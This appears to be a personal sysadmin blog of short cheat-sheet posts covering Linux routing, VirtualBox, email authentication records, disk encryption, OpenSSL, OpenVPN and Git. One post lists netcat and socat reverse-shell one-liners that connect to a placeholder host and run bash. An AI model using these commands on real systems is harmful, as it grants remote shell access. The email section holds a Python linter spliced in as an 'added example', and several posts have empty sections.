iproute2
November 27, 2016 — 14:55

Author: silver  Category: network  Comments: Off

Documentation

Linux Advanced Routing & TC: http://lartc.org/howto/index.html

Basic commands

I guess ifconfig is deprecated now…

Help:

ip a help

( a=address l=link r=route )

Show:

ip a show eth0

ip l show eth0

ip r get 8.8.8.8

( use ip -4 or -6 for ipv4/6 )

Change:

ip l set dev eth0 up

ip a add 192.168.1.2/24 dev eth0


Two Default Gateways

Useful to set up for hosts on multiple subnets/networks.

Howto’s:

Instructions

Add table:

echo -e "10\trt2" >> /etc/iproute2/rt_tables

Add route/rule:

ip route add 1.2.3.0/20 dev eth1 src 1.2.3.172 table rt2
ip route add default via 1.2.3.1 dev eth1 table rt2

ip rule add from 1.2.3.172/32 table rt2
ip rule add to 1.2.3.172/32 table rt2

ip rule add from 1.2.3.173/32 table rt2
ip rule add to 1.2.3.173/32 table rt2

ip route flush cache
ip route list table rt2
ip route show
ip rule show

Testing:

ping -I 1.2.3.172 8.8.8.8

Making it permanent

debian:

/etc/network/interfaces
/etc/network/interfaces.d/eth1

post-up ip route add 1.2.3.0/20 dev eth1 src 1.2.3.174 table rt2
post-up ip route add default via 1.2.3.1 dev eth1 table rt2
post-up ip rule add from 1.2.3.174/32 table rt2
post-up ip rule add to 1.2.3.174/32 table rt2

/etc/network/interfaces.d/eth1:0

post-up ip rule add from 1.2.3.176/32 table rt2
post-up ip rule add to 1.2.3.176/32 table rt2

redhat:

echo "1.2.3.0/20 dev eth1 src 1.2.3.172 table rt2" >> /etc/sysconfig/network-scripts/route-eth1
echo "default via 1.2.3.1 dev eth1 table rt2" >> /etc/sysconfig/network-scripts/route-eth1

echo "from 1.2.3.172/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "to 1.2.3.172/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "from 1.2.3.173/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1
echo "to 1.2.3.173/32 table rt2" >> /etc/sysconfig/network-scripts/rule-eth1

VirtualBox
November 27, 2016 — 2:51

Author: silver  Category: virtualization  Comments: Off

Tips & tricks

Guest clipboard:

/usr/bin/VBoxClient
/usr/bin/VBoxClient --clipboard
/usr/bin/VBoxClient --draganddrop

Resize VDI:

  • SIZE_IN_MB would be 30000 for 30GB
  • VBoxManage list hdds

Windows Host:

C:\Program Files\Oracle\VirtualBox\VboxManage.exe modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB

Mac Host:

# /Applications/VirtualBox.app/Contents/MacOS/VBoxManage modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB

Linux Host:

# VBoxManage modifyhd YOUR_HARD_DISK.vdi --resize SIZE_IN_MB

Linux Guest: # resize2fs /dev/sda1

Compact disk

Windows Guest:
– Cleanup
– Defrag
– sdelete -z, sdelete -c
– shutdown
– VBoxManage modifyhd --compact disk.vdi

Convert disk:

/usr/bin/VBoxClient --display
VBoxManage internalcommands converttoraw file.vdi file.raw
VBoxManage clonehd hdd.vdi hdd.img --format raw

convertfromraw
  [--format VDI|VMDK|VHD]
  [--variant Standard,Fixed,Split2G,Stream,ESX]
  [--uuid ]

convertfromraw stdin
  [--format VDI|VMDK|VHD]
  [--variant Standard,Fixed,Split2G,Stream,ESX]
  [--uuid ]

clonehd <uuid|inputfile> <uuid|outputfile>
  [--format VDI|VMDK|VHD|RAW|]
  [--variant Standard,Fixed,Split2G,Stream,ESX]
  [--existing]

Autostop – Linux Host:

VBoxManage modifyvm VM [--autostop-type disabled|savestate|poweroff|acpishutdown]
VBoxManage modifyvm VM --autostop-type acpishutdown

Autostart init script:

From: https://forums.virtualbox.org/viewtopic.php?f=7&t=65194

Re: Autostart VM on debian 7.7 virtualbox 4.3.20

Post by lnunes_pt » 19. Dec 2014, 02:40
Hi PavloM,

The answer to the first question is, NO, you need not login to host. But also, NO, you need not reboot host to test VMs starts.
The manual section 9.23.1 is not complete. Don’t use vbox.cfg for the configuration file name, otherwise setproperty autostartdbpath will lead to command syntax issues later.

Just to be sure you know, the VirtualBox autostart service init script is specially used in cases where you have many users on the host and want to control who can autostart VMs upon boot.
If you’re the only user on the host it’s also just simpler to start any headless VM from /etc/rc.local.

Edit /etc/default/virtualbox

    VBOXAUTOSTART_DB=/etc/vbox
    VBOXAUTOSTART_CONFIG=/etc/vbox/vboxautostart.cfg

Edit vboxautostart.cfg using the Bob example of how to deny all and allow bob:

    default_policy = deny
    bob = {
        allow = true
        startup_delay = 10
    }

Create the vboxautostart.cfg file. Add vboxusers group to /etc/vbox and sticky bit.

    # chgrp vboxusers /etc/vbox
    # chmod 1775 /etc/vbox

Add vboxusers group to all users (of course).

Then Execute once as users:

    $ VBoxManage setproperty autostartdbpath /etc/vbox

And for every VM to start, then you find under /etc/vbox, user.start file.
But also how it will stop, then you find under /etc/vbox, user.stop file.

    $ VBoxManage modifyvm  --autostart-enabled on
    $ VBoxManage modifyvm  --autostop-type acpishutdown

Then test START and STOP as root without need of host reboot.

    # /etc/init.d/vboxautostart-service start

Logon to the VM and test the shutdown next. You should get logged off for system shutdown:

    # /etc/init.d/vboxautostart-service stop

Note: The VirtualBox autostart script should exist at /etc/init.d/vboxautostart-service (it can be downloaded from the Source Code Repository: trunk -> src -> VBox -> Installer -> linux -> vboxautostart-service.sh)

Autostart delay:

VBoxManage modifyvm VMNAME --autostart-delay 10

Autostop – Windows Host:

Display

VBoxManage controlvm VMNAME setvideomodehint 1680 975 16

(or 16/24/32)

Headless

VBoxManage startvm "VM" --type headless

Shares

Host: Share Folder (e.g. “foo”), Full Access (write)
Guest: # mkdir /mnt/foo; mount -t vboxsf foo /mnt/foo

Mount VDI (NTFS)

Guest:

# modprobe nbd max_part=16
# qemu-nbd -c /dev/nbd0 image.vdi
# mkdir /mnt/image; mount /dev/nbd0p2 /mnt/image

To remove:
# qemu-nbd -d /dev/nbd0

SPF, DKIM and DMARC
November 26, 2016 — 23:39

Author: silver  Category: other  Comments: Off

Prevent email spoofing, phishing and spam by setting these DNS TXT records.

Sender Policy Framework (SPF):

domain.com. IN TXT "v=spf1 a mx include:domain.com ~all"

DomainKeys Identified Mail (DKIM):

Generate public/private key with opendkim-tools.

$ opendkim-genkey --bits=2048 --domain=domain.com --verbose

Use the private key for your mail server, e.g. Postfix.
Use the public key for the TXT record ("1234+ABc/dEF"):

_domainkey.domain.com. IN TXT "o=-"
default._domainkey.domain.com. IN TXT "v=DKIM1; g=*; k=rsa; p=1234+ABc/dEF;"

Domain-based Message Authentication, Reporting and Conformance (DMARC):

_dmarc.domain.com IN TXT "v=DMARC1; p=reject; rua=mailto:[email protected]; ruf=mailto:[email protected]"
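As an added example (not from the original post), here is a small offline linter for the three record types above: it parses SPF, DKIM and DMARC TXT records and reports the settings a defender would want to tighten (a ~all or +all qualifier, an include that points back at the domain itself, the RFC 7208 limit of 10 DNS lookups, a revoked or short DKIM key, a DMARC policy of none). The sample records are constructed from the post's placeholders (domain.com, the dummy p= value) and the function names are mine.

```python
import base64
# Constructed samples modelled on the post's records; domain.com is a placeholder and the DKIM p= is the post's dummy string, not a real key.
SPF_RECORD = "v=spf1 a mx include:domain.com ~all"
DKIM_RECORD = "v=DKIM1; g=*; k=rsa; p=1234+ABc/dEF;"
DMARC_RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc@domain.com; ruf=mailto:dmarc@domain.com"
LOOKUP_TERMS = ("a", "mx", "ptr", "exists", "include", "redirect")  # each costs a DNS query

def parse_tags(record):
    """Turn a 'k=v; k2=v2' tag list (DKIM, DMARC) into a dict, preserving order."""
    pairs = (p.split("=", 1) for p in record.split(";") if "=" in p)
    return {k.strip().lower(): v.strip() for k, v in pairs}

def check_spf(record, domain):
    """Warnings for the SPF record published at `domain`; [] means it looks sound."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["SPF: record must start with v=spf1"]
    warnings, lookups, all_term = [], 0, None
    for term in terms[1:]:
        name = term.lstrip("+-~?").split(":")[0].split("=")[0].lower()
        arg = (term.partition(":")[2] or term.partition("=")[2]).lower()
        lookups += name in LOOKUP_TERMS
        if name == "all":
            all_term = term.lower()
        elif name in ("include", "redirect") and arg == domain.lower():
            warnings.append(f"SPF: {term} points back at {domain}; the check recurses until the lookup limit (permerror)")
    if lookups > 10:  # RFC 7208 section 4.6.4 hard limit
        warnings.append(f"SPF: {lookups} DNS lookups, RFC 7208 allows at most 10")
    if all_term in ("all", "+all"):
        warnings.append("SPF: +all lets any host send as this domain")
    elif all_term == "~all":
        warnings.append("SPF: ~all is softfail; move to -all once DMARC reports look clean")
    return warnings

def check_dkim(record):
    """Warnings for a selector._domainkey TXT record."""
    tags, warnings = parse_tags(record), []
    if "g" in tags:
        warnings.append("DKIM: g= was dropped in RFC 6376; modern verifiers ignore it")
    if not tags.get("p"):
        return warnings + ["DKIM: empty p= means the key is revoked; nothing signed with it verifies"]
    try:
        der = base64.b64decode(tags["p"], validate=True)
    except ValueError:
        return warnings + ["DKIM: p= is not valid base64"]
    if len(der) < 270:  # an RSA-2048 SubjectPublicKeyInfo is 294 bytes, RSA-1024 is 162
        warnings.append(f"DKIM: decoded key is {len(der)} bytes, shorter than a 2048-bit RSA key")
    return warnings

def check_dmarc(record):
    """Warnings for the _dmarc TXT record."""
    tags, warnings = parse_tags(record), []
    if list(tags)[:2] != ["v", "p"] or tags["v"] != "DMARC1":
        return ["DMARC: record must begin 'v=DMARC1; p=...' in that order"]
    if tags["p"] == "none":
        warnings.append("DMARC: p=none only monitors; spoofed mail is still delivered")
    if "rua" not in tags:
        warnings.append("DMARC: no rua= address, so no aggregate reports arrive")
    return warnings
```

Run against the post's own records it flags the ~all softfail, the include of domain.com by domain.com itself and the dummy DKIM key; the DMARC record passes clean.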

Testing:

gnome-keyring
November 26, 2016 — 17:52

Author: silver  Category: linux  Comments: Off

Quickfix issues

Restart:

gnome-keyring-daemon -r -d

If that doesn’t suffice, these extra steps might help:

pgrep -f gnome-keyring-daemon
rm -rf ~/.cache/keyring-*
setsid /usr/bin/gnome-keyring-daemon >/dev/null 2>&1
ln -s ~/.cache/keyring-* $GNOME_KEYRING_CONTROL
/usr/bin/gnome-keyring-daemon --start --components=pkcs11
/usr/bin/gnome-keyring-daemon --start --components=gpg
/usr/bin/gnome-keyring-daemon --start --components=ssh
find ~/.cache/ -maxdepth 1 -type l -name 'keyring-*' -delete

Sendmail with attachment
November 26, 2016 — 17:48

Author: silver  Category: linux  Comments: Off

Oneliner to send email with attachment using sendmail:

$S Subject
$B Body
$A Attachment


Display man pages as text
November 26, 2016 — 15:51

Author: silver  Category: linux  Comments: Off

man openssl | cat
man -P cat openssl
groff -t -e -mandoc -Tascii manpage.1 | col -bx > manpage.txt

Windows Disk Encryption
November 26, 2016 — 14:35

Author: silver  Category: encryption windows  Comments: Off

Before I chose to replace TrueCrypt with VeraCrypt I was looking for/comparing alternatives.
I also use Bitlocker and EFS that are included with Windows.

Except for DiskCryptor and LibreCrypt all these programs also run on Linux.

More here: http://www.surfsafely.com/truecrypt-alternatives

Linux Disk Encryption
November 26, 2016 — 13:04

Author: silver  Category: encryption linux  Comments: Off

Linux disk encryption using the device mapper, the cryptsetup frontend and the Linux Unified Key Setup (LUKS) on-disk format.

Setup:

cryptsetup -y -v luksFormat /dev/sdb1
cryptsetup luksOpen /dev/sdb1 foo
cryptsetup status foo -v

Test:

cryptsetup --test-passphrase open /dev/sdb1 # (non-LUKS)
cryptsetup luksOpen --test-passphrase /dev/sdb1
cryptsetup isLuks /dev/sdb1 && echo IMaLUKS
cryptsetup luksDump /dev/sdb1

Change:

(asks for the current passphrase first)

cryptsetup -y luksChangeKey <target device> -S <target key slot number>
cryptsetup -y luksChangeKey /dev/sdb1 -S 1

Or use gui gnome-disks:

  • Disks (gnome-disks)
  • 1.0TB Hard Disk
  • Volumes: “Partition 1 1.0 TB LUKS”
  • Cogs/wheels

Add/remove key:

sudo cryptsetup -y luksAddKey ENCRYPTED_PARTITION
sudo cryptsetup luksRemoveKey ENCRYPTED_PARTITION

Various:

dmsetup ls --tree
lsblk
lsblk --fs

Reverse shells
November 26, 2016 — 12:45

Author: silver  Category: linux  Comments: Off

USING NETCAT:

SERVER/LISTEN:

netcat -lvp 9999

CLIENT:

netcat -e /bin/sh host.name 9999


NICER SHELL:

python -c 'import pty; pty.spawn("/bin/bash")'
( sleep 1; echo 'bla' ) | python -c "import pty; pty.spawn(['/usr/bin/sudo','-S','whoami']);"

USING SOCAT:

SERVER/LISTEN:

socat file:`tty`,raw,echo=0 tcp-listen:8888

CLIENT:

socat tcp-connect:host.name:8888 exec:'bash -li',pty,stderr,setsid,sigint,sane

CLIENT:

socat tcp:host.name:8888 exec:"bash -li",pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:8888,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
socat FILE:`tty`,raw,echo=0 TCP:1.2.3.4:8888
export STY=
stty rows 40 cols 130
stty rows 40 cols 230

EncFS
November 25, 2016 — 22:02

Author: silver  Category: encryption linux  Comments: Off

Install on CentOS6:

Required packages:

yum install -y fuse-2.8.3-5.el6.x86_64 
yum install -y fuse-libs.x86_64
yum install -y fuse-devel.x86_64
usermod -a -G fuse <your_user>
yum install -y git
yum install -y cmake
yum install -y boost-serialization.x86_64
yum install -y openssl-devel.x86_64
yum install -y rlog-devel.x86_64
yum install -y tinyxml2-devel.x86_64 
yum install -y gettext-devel.x86_64
yum install -y centos-release-scl
yum install -y devtoolset-3-gcc-c++

Compile:

scl enable devtoolset-3 bash
git clone https://github.com/vgough/encfs
cd encfs
mkdir build
cd build
cmake ..
make
make test
make install
make package
mkdir ~/test
mkdir ~/Private

Test:

encfs ~/Private ~/test
echo testing > ~/test/testfile
fusermount -u ~/test

OpenVPN AS
November 25, 2016 — 21:31

Author: silver  Category: encryption linux  Comments: Off

OpenVPN Access Server is quite easy and fast to setup and includes a web gui.

Download:

Configuration:

Clickety click in the gui, plus some hardening:

Server:

Client:

auth SHA512
cipher AES-256-CBC

Connect with SSH + SOCKS Proxy + OTP:

$ ssh -D 1 to remote host

Ban user:

Ban a user from logging into the VPN or Web server
(doesn’t affect a user who is already logged in — for this, use DisconnectUser below):

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value true UserPropPut

Re-admit a user who was previously banned:

/usr/local/openvpn_as/scripts/sacli --user <USER> --key prop_deny --value false UserPropPut

Disconnect a user:

/usr/local/openvpn_as/scripts/sacli --user <USER> DisconnectUser

Set client cert keysize:

/usr/local/openvpn_as/scripts/sa --keysize=4096 Init

Generating init scripts:

/usr/local/openvpn_as/scripts/openvpnas_gen_init [--auto]

Google Authenticator:

Unlock a secret:

./sacli -u <USER> --lock 0 GoogleAuthLock

Lock a secret:

./sacli -u <USER> --lock 1 GoogleAuthLock

Generate a new, unlocked secret:

./sacli -u <USER> --lock 0 GoogleAuthRegen

Generate a new, locked secret:

./sacli -u <USER> --lock 1 GoogleAuthRegen

Enable Google Authenticator for all accounts:

./sacli --key vpn.server.google_auth.enable --value true ConfigPut

Enable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value true UserPropPut

Disable:

./sacli --key vpn.server.google_auth.enable --value false ConfigPut

Disable for 1 user:

./sacli --user <USER_OR_GROUP> --key prop_google_auth --value false UserPropPut

Revoke and reissue secret:

./sacli -u <USER> GoogleAuthRegen

Retrieve current user properties:

./confdba -us -p

Port sharing:

Advanced VPN Settings: port-share 127.0.0.1 10443
(tcp mode only)

OpenSSL
November 25, 2016 — 21:26

Author: silver  Category: encryption linux  Comments: Off

List deleted open files (after update):

lsof | grep -i libssl | grep DEL | awk '{print $1}' | sort | uniq

Generate CSR, self signed cert:

openssl genrsa -out rootCA.key 2048
openssl genrsa -des3 -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 3650 -out rootCA.pem
openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 3650 -sha256

View CSR

openssl req -in file.csr -noout -text

View cert fingerprint

openssl x509 -fingerprint -noout -in file.crt -sha256
openssl x509 -fingerprint -noout -in file.crt -sha1
openssl x509 -fingerprint -noout -in file.crt -md5

View ciphers:

openssl ciphers -v 'TLSv1' | sort

Test ciphers:

openssl s_client -connect google.com:443 -cipher "EDH"
openssl s_client -connect google.com:443 -cipher "RC4"
openssl s_client -connect google.com:443 -tls1
openssl s_client -connect google.com:443 -tls1_1
openssl s_client -connect google.com:443 -tls1_2
echo -n | openssl s_client -connect google.com:443
nmap --script ssl-enum-ciphers -p 443

Get fingerprint from live SSL cert (IRC):

echo | openssl s_client -connect efnet.port80.se:6697 |& openssl x509 -fingerprint -noout -sha256
echo | gnutls-cli -p 6697 irc.underworld.no --print-cert | sed -n '/-----BEGIN CERT/,/-----END CERT/p' |& openssl x509 -fingerprint -noout -sha256

Show fingerprint:

openssl x509 -in cert.pem -fingerprint -noout

To change the password of your private key:

openssl rsa -des3 -in ca.key -out ca_new.key
mv ca_new.key ca.key

Verifying that a Private Key Matches a Certificate

$ openssl x509 -noout -modulus -in server.pem | openssl md5 ;\
openssl rsa -noout -modulus -in server.key | openssl md5

Get the MD5 fingerprint of a certificate using OpenSSL

openssl dgst -md5 certificate.der

Get the MD5 fingerprint of a CSR using OpenSSL

openssl dgst -md5 csr.der

Debug SMTP/STARTTLS:

openssl s_client -debug -starttls smtp -crlf -connect localhost:25

File Encryption
November 25, 2016 — 18:44

Author: silver  Category: encryption linux  Comments: Off

All of these are FUSE based except for eCryptfs.

Comparison: https://nuetzlich.net/gocryptfs/comparison

CryFS
November 25, 2016 — 18:18

Author: silver  Category: encryption linux  Comments: Off

Download:

http://cryfs.org
https://github.com/cryfs/cryfs

Compile under CentOS 6:

yum install https://www.softwarecollections.org/repos/denisarnaud/boost157/epel-6-x86_64/noarch/denisarnaud-boost157-epel-6-x86_64-1-2.noarch.rpm
yum install -y boost157-devel.x86_64 boost157-static.x86_64 
scl enable devtoolset-3 bash
export BOOST_ROOT=/usr/include/boost157
export BOOST_LIBRARYDIR=/usr/lib64/boost157
mkdir cmake && cd cmake
cmake ..
make
sudo make install

Compile PuTTY under Cygwin
November 25, 2016 — 17:16

Author: silver  Category: windows  Comments: Off

  1. Download the dev snapshot and verify it:

gpg --verify putty-src.zip.gpg putty-src.zip
grep "$( sha512sum putty-src.zip | cut -d' ' -f1 )" sha512sums

  2. Run the compile.sh script below:

#!/bin/sh

echo
echo "putty needs the following pkgs under cygwin64:"
echo "mingw64-x86_64-headers w32api w32api-headers"
echo
#export PERL5LIB=/usr/lib/perl5/5.22/CPAN
perl mkfiles.pl
sed -i.bak 's/\r//g' licence.h
make distclean
cd windows
make clean -f Makefile.mgw

make -j4 \
TOOLPATH="x86_64-w64-mingw32-" \
CFLAGS="-Wall -O2 -D_WINDOWS -DDEBUG -DWIN32S_COMPAT -D_NO_OLDNAMES -I.././ \
-I../charset/ -I../windows/ -I../unix/ \
-D_WIN32_IE=0x0500 \
-DWINVER=0x0500 -D_WIN32_WINDOWS=0x0410 -D_WIN32_WINNT=0x0500 \
-DNO_MANIFESTS" \
LDFLAGS="-s" \
RCFLAGS="--define WIN32=1 --define _WIN32=1 --define WINVER=0x0400 \
-I.././ -I../charset/ -I../windows/ -I../unix/" \
COMPAT="-DWINSOCK_TWO -DNO_MULTIMON" \
-f Makefile.mgw

It’s also possible to make with version variables:

make VER="-DSNAPSHOT=$(date '+%Y-%m-%d') -DSVN_REV='$(svnversion)' -DMODIFIED" TOOLPATH=i586-mingw32msvc- -f Makefile.cyg putty.exe
Serial console
November 25, 2016 — 17:14

Author: silver  Category: linux  Comments: Off

/etc/default/grub:

GRUB_CMDLINE_LINUX="video=off elevator=deadline console=tty0 console=ttyS0,115200"
GRUB_TERMINAL=serial
GRUB_SERIAL_COMMAND="serial --unit=0 --speed=115200 --stop=1"

/etc/inittab:

0:2345:respawn:/sbin/agetty -8 ttyS0 115200 vt100

Git
November 25, 2016 — 13:07

Author: silver  Category: linux  Comments: Off

Just a little cheatsheet… ;)

Start ssh-agent:

eval $( ssh-agent )
ssh-add /home/user/.ssh/id_ed25519_git
ssh -T [email protected]

Now you should be able to “git push”

New repository, using SSH:

git push origin master
git remote set-url origin [email protected]:username/repo.git
git remote add origin [email protected]:username/repo.git
git add .
git commit -m "First commit"

To change commit comment:

git commit --amend

Branches:

Clone the repository:

git clone

List all branches:

git branch -a

Checkout the branch that you want:

git checkout my-patch

Adding branches:

git branch
git checkout -b branchname
git push origin branchname
git remote add branchname [email protected]:username/repo.git
git commit .
git push branchname branchname

Switch between branches:

git checkout master
git checkout -

Remove remote (not really harmful):

git remote remove

More details about branches:

Update your branch when the original branch from the official repository has been updated:

$ git fetch [name_of_your_remote]

Then merge the changes; if your branch is derived from develop you need to do:

$ git merge [name_of_your_remote]/develop

Delete a branch on your local filesystem:

$ git branch -d [name_of_your_new_branch]

To force the deletion of a local branch on your filesystem:

$ git branch -D [name_of_your_new_branch]

Delete the branch on GitHub:

$ git push origin :[name_of_your_new_branch]

Color:

git diff --color-words
git log --color-words
git show --color-words

Undo:

git checkout .  # revert your changes
git clean -fdxn # dry run
git clean -xdf  # delete untracked and ignored files (!!!)

SHA Hash:

git hash-object

(compare to:)
https://api.github.com/repos/user/repos/contents/file
https://api.github.com/repos/user/repos/blobs/hash

Removing sensitive data:

bfg --delete-files YOUR-FILE-WITH-SENSITIVE-DATA
bfg --replace-text passwords.txt

OR

git filter-branch --force --index-filter \
'git rm --cached --ignore-unmatch PATH-TO-YOUR-FILE-WITH-SENSITIVE-DATA' \
--prune-empty --tag-name-filter cat -- --all

(add to .gitignore)

git push origin --force --all
git push origin --force --tags
git for-each-ref --format='delete %(refname)' refs/original | git update-ref --stdin
git reflog expire --expire=now --all
git gc --prune=now

Working state:

Use git stash when you want to record the current state of the working directory and the index, but want to go back to a clean working directory

git stash
git stash list
git stash show
git stash show -p --color

(!) remove all states:

git stash clear

List remote:

git ls-remote $URL

Versioning:

short commit hash:

git rev-parse --short HEAD
git describe --tags --always --dirty=-dirty

Logs:

git log --graph --abbrev-commit --format=format:'%h - %s%d'
git log --oneline 
git log --pretty=oneline --abbrev-commit
git log --abbrev-commit
git log -1 --abbrev-commit
git log -1 --pretty=format:%h

WP-CLI
November 25, 2016 — 12:38

Author: silver  Category: web  Comments: Off

WP-CLI: A command line interface for WordPress

Download from: https://wp-cli.org/

Configuration:

  • /etc/sudoers.d/wp-cli:
  • crontab: